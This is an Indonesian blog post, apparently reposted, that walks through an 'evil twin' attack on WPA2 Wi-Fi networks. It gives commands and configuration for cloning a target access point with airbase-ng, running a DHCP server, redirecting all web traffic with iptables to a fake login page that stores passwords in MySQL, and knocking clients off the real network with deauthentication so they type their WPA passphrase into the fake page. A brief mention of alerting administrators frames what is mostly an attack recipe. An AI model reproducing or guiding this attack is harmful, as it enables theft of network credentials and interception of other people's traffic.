Kamis, 22 Maret 2012

TweetThis Button

hacking wpa/wpa2 tanpa wordlist/bruteforce

hacking wpa/wpa2 tanpa wordlist/bruteforce

Kembali lagi bersama dengan ane , zee eichel kali ini saya akan mencoba membahas tentang metode serangan pada wpa2 tanpa menggunakan wordlist atau metode bruteforcing dengan aircrack-ng, sering menjadi keluhan dari teman-teman karena sulitnya menembus wpa2 tanpa menggunakan tehnik standart. Metode kali ini disebut eviltwin sehingga dapat menjadi pengalaman serta wejangan kita sebagai administrator jaringan wireless atau wiffi agar dapat waspada dan berhati-hati terdahap kemungkinan serangan seperti ini.

Modus serangan ini sebenarnya simple , baik akan saya jelaskan satu demi satu bagaimana attacker melakukan trik ini. Inti dari trik ini, adalah membuat akses point palsu yang di buat serupa mungkin dengan ap target, dengan harapan client akan “salah konek” atau mengkoneksikan dirinya ke akses point yang bukan sebenarnya.Masih ingat metode fakelogin ? yup attacker akan mengkombinasikan serangan ini dengan metode fakelogin yang memiliki kemampuan untuk menyimpan data. Bagaimana attacker melakukannya ? baik kita mulai

1. Mempersiapkan fakelogin AP

Untuk contoh kali ini saya telah mengupload contoh halaman login akses point palsu di http://ftp.indonesianbacktrack.or.id , teman-teman bisa mendownloadnya di sana.

A. Membuat database
Seperti yang saya jelaskan sebelumnya , ada baiknya kita membuat sebuah database pada localhost kita karena tujuan dari serangan ini adalah membawa client dari AP target mengakses sebuah fakelogin pada localhost kita sehingga client tersebut tertipu dan melakukan authentifikasi di fakelogin tersebut. Database yang saya setting pada fakelogin palsu adalah bernama wpa2 karena itu kita buat database “wpa2″ dan buat table “content” Lebih jelasnya lihat ss di bawah ini.Ok jalankan service daemon mysql terlebih dahulu ,

Code:
/etc/init.d/mysql start

Spoiler! :

B. FakeLogin
Buatlah fakelogin pada localhost kita , unzip file yang telah kita download dari ftp IBTeam tadi kemudian usahakan taruh pada direktori “/” pada service apache, kalau di backtrack atau ubuntu bisa ditempatkan di direktori “/var/www”.

Code:
root@eichel:/var/www# ls -al
total 84
drwxrwxrwx 6 531 527 4096 2012-03-17 17:21 .
drwxr-xr-x 15 root root 4096 2011-05-10 22:56 ..
-rw-r--r-- 1 root root 1035 2011-12-27 19:16 error.html
-rw-r--r-- 1 root root 1455 2011-12-27 16:23 gradientstrip.gif
-rw-r--r-- 1 root root 1149 2012-01-04 23:06 index.html
-rwxrwxrwx 1 531 527 13 2011-03-30 04:45 .lastlogin
-rw-r--r-- 1 root root 716 2012-03-17 16:51 savekey.php
-rw-r--r-- 1 root root 892 2012-03-17 16:47 update.html
-rw-r--r-- 1 root root 651 2011-12-27 17:58 verizon.css
-rw-r--r-- 1 root root 3195 2011-12-27 16:24 vlogo_blk.gif

Jika sudah jalankan service apache kita “/etc/init.d/apache2 start” kemudian buka localhost atau dengan ip local kita pada browser.

Spoiler! :

Okey semua yang kita butuhkan sudah siap , kemudian seperti yang sudah saya singgung di atas, attacker akan membuat sebuah AP palsu yang hampir sama dengan AP Target.

2. FakeAP

A. Information Gathering
Metode ini di mulai dari tahap information gathering terhadap AP Target. dimana kita mengambil semua informasi kemudian membuat AP yang sama persis dengan AP target. Ok kita mulai

Spoiler! :

Percobaan ini saya lakukan pada IBTeam Lab di jakarta, sehingga saya memakai IBTeam AP sebagai target. Gunakan “airodump-ng [interface-monitor]” untuk mengambil informasi AP Target.

Spoiler! :

B. Dhclient Server
Untuk keperluan membuat fakeAP dengan kemampuan dhcp kita harus menginstall dhclient server di localhost kita, pengguna backtrack dan debian lainnya dapat menginstall service ini dengan apt-get.

Spoiler! :

Uppz ada keterangan fail disitu .. itu dikarenakan setingan file konfigurasi pada dhcp3-server belum di konfigurasi dengan benar. Baik sebelumnya kita backup terlebih dahulu file konfigurasi default sebelum membuat file konfigurasi yang kita inginkan.

Spoiler! :

Jika sudah kita buat file konfigurasi dengan setingan yang kita kehendaki dengan menggunakan editor kesayangan anda,

Code:
root@eichel:/var/www# kwrite /etc/dhcp3/dhcpd.conf
Kemudian isikan seperti contoh di bawah ini, anda dapat menggantinya sesuai kebutuhan konfigurasi IP, DNS, gateway , dll.

Quote:ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.128 netmask 255.255.255.128 {
option subnet-mask 255.255.255.128;
option broadcast-address 192.168.2.255;
option routers 192.168.2.129;
option domain-name-servers 8.8.8.8;
range 192.168.2.130 192.168.2.140;
}

Konfigurasi di atas sebenarnya merupakan konfigurasi IP yang nantinya akan di pakai pada AP palsu kita nantinya. Dan adanya support DHCP agar client bisa mendapatkan ip secara otomatis.

C. Airbase-ng
Ok tahap selanjutnya kita akan membuat FakeAP dengan konfigurasi IP yang sama dengan konfigurasi pada dhcp server yang telah kita buat pada tahap sebelumnya. Namun informasi AP haruslah sama dengan hasil tahap “information gathering” terhadap AP target. kita matikan terlebih dahulu beberapa proses monitor pertama

Code:
root@eichel:~# airmon-ng stop mon0
Interface Chipset Driver
mon0 Ralink RT2870/3070 rt2800usb - [phy0] (removed)
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
root@eichel:~# airmon-ng stop wlan0
Interface Chipset Driver
wlan1 Ralink 2573 USB rt73usb - [phy2]
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode disabled)
Jika sudah sesuai dengan channel AP target ( dalam kasus ini 11 – lihat pada tahap information gathering ) , kita memulai airmon-ng pada channel 11.

Spoiler! :

Setelah itu kita jalankan airbase-ng untuk memulai FakeAP. ssid dan channel disikan persis sama dengan hasil “information gathering” dengan airodump untuk mengecoh client.

Code:
syntaxnya : airbase-ng -e [ssid] -c [channel] -a [bssid] [interface]

Spoiler! :

Kemudian perhatikan output pada perintah airbase-ng yang telah kita jalankan barusan, nah airbase-ng akan menciptakan sebuah interface baru yaitu “at0″ dimana nantinya interface at0 tersebut yang akan menjadi patokan konfigurasi IP pada fakeap yang sendang kita buat. Karena itu konfigurasikan IP pada at0 sesuai dengan konfigurasi routing pada DNS, netmask, gw ( gateway ) pada file /etc/dhcp3/dhcpd.conf. Kemudian jalankan service dhcp3-server.

Spoiler! :

3. IPtables

Setelah semuanya berhasil dengan baik, harapan attacker adalah client terkecoh ketika mengakses fakeAP yang telah di buat sebelumnya, maka attacker berharap agar client mengira bahwa authentifikasi pada wpa2 yang diaksesnya berubah menjadi authentifikasi pada browser. yaitu pada index fakelogin yang telah kita siapkan pada server apache/httpd pada localhost kita. Permasalahannya adalah bagaimana client dapat mengakses AP tidak menjadi masalah lagi, tapi bagaimana agar client mengakses localhost kita yang menjadi masalah. Baik kita gunakan iptables untuk meredirect setiap url yang dimasukan client pada browser ( port 80 ) menuju kepada localhost kita. Misalnya client mengakses google.com maka browser akan mengarahkannya terlebih dahulu ke file pada localhost apache kita.

A. Menghapus semua setingan IPtables.
Pertama-tama kita hapus semua setingan iptables pada NAT, chain ,dll

Code:
root@eichel:~# iptables --flush
root@eichel:~# iptables --table nat --flush
root@eichel:~# iptables --delete-chain
root@eichel:~# iptables --table nat --delete-chain

B.Lakukan routing untuk membuat interface at0 dapat diselaraskan dengan interface inti ( eth0 )

Code:
root@eichel:~# iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
root@eichel:~# iptables –append FORWARD –in-interface at0 -j ACCEPT

Kemudian lanjutkan dengan mengaktifkan ip_forward

Code:
root@eichel:~# echo 1 > /proc/sys/net/ipv4/ip_forward

C. Redirect semua permintaan pada port 80
Buatlah sebuah rulles pada iptables agar client akan teredirect pada saat mengakses port 80. Alamat yang digunakan sebagai destination ( tujuan ) tentu saja adalah alamat pada interface kita yang terkoneksi dengan internet.

Code:
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 44:87:fc:56:86:85
inet addr:192.168.1.13 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::4687:fcff:fe56:8685/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:99424 errors:0 dropped:0 overruns:0 frame:0
TX packets:92864 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:94380248 (94.3 MB) TX bytes:16195158 (16.1 MB)
Interrupt:43

Okey seperti ouput di atas agaknya saya menggunakan ip address 192.168.1.13 yang terkonek dengan gateway berbeda dengan akses point target. Hmm jgn bingung dengan hal ini karena ada kemungkinan pada administrasi jaringan sysadmin memakai beragam subnet ip pada tiap2 AP yang terdapat dalam satu jaringan.

Code:
root@eichel:~#iptables -t nat -A PREROUTING -p tcp –dport 80 -j DNAT –to-destination 192.168.1.13:80
root@eichel:~# iptables -t nat -A POSTROUTING -j MASQUERADE

4. Deauthentifikasi

Agar client terkecoh sesuai dengan tujuan kita , tentunya kita harus mematikan terlebih dahulu akses point dan client yang terkonek didalamnya agar client nantinya malah login ke fakeAP. Kita gunakan aireplay-ng , ane rasa masih pada ingat perintah-perintah dasarnya

Spoiler! :

Perhatikan pada tab terminal airbase-ng

okey ternyata korban memakan pancingan setelah terdeauthentifikasi dari APTarget dan melakukan authentifikasi ke FakeAP

Spoiler! :

Client Target side

Mari kita mengintip sebentar proses pada client

Client pada percobaan kali ini memakai sistem operasi windows 7 , anggap saja client masih terkonek dengan AP asli , lihat pada gambar di bawah ada 2 AP yang telah terbentuk

Spoiler! :

Kemudian keadaan koneksi ke AP pada saat serangan deauth

Spoiler! :

Dan client pada saat client terkoneksi dengan FakeAP maka routing Iptables ternyata berhasil dengan baik

Spoiler! :

Anggap client terpancing untuk mengisi password wpa

Spoiler! :

5. Melihat hasil
Kita tinggal melihat pada database yang telah kita buat tadi , kalau client terkecoh kemudian mengisi password maka password akan terecord pada database

Spoiler! :

Oke sampai disini dulu ya.. semoga nantinya ada tehnik-tehnik lainnya yang bisa saya jabarkan untuk teman-teman ..

sumber : http://technicdynamic.com/2011/12/hackin...ruteforce/

0 komentar:

Posting Komentar

.:Tutorial DHTML DLL:.

Tutorial tentang Dhtml scripts, Jquery plugins ,Javascript, CSS, CSS3, Html5 Library dll dan penerapannya pada Website, langsung aja kunjungi Website nya dan yang nggak kalah penting Free Yaa !!

.:distrowatch:.

Pengin Banyak tau tentang distro linux Langsung Aja Kunjungi DistroWatch Hmmm, banyak banget distronya, Download dan Pasang Linuxnya Lets Go Boss !!

.:jQuery Tutorial:.

Tutorial jQuery Widget ada disini semua Langsung Ke TKP Boss !!

.:Hirens Boot CD:.

Hiren's Boot CD cukup ampuh untuk membuat Clonning Atau Copy windows, dan banyak tool yang sangat berguna bagi para teknisi komputer maupun yang masih pemula silahkan Download filenya Disini kalo mau lihat tutorialnya membuat Flashdisc Bootable Disini Lumayan buat nambah ilmu dan Tool, Langsung aja Boss !!

Hiren’s BootCD

Bookmark and Share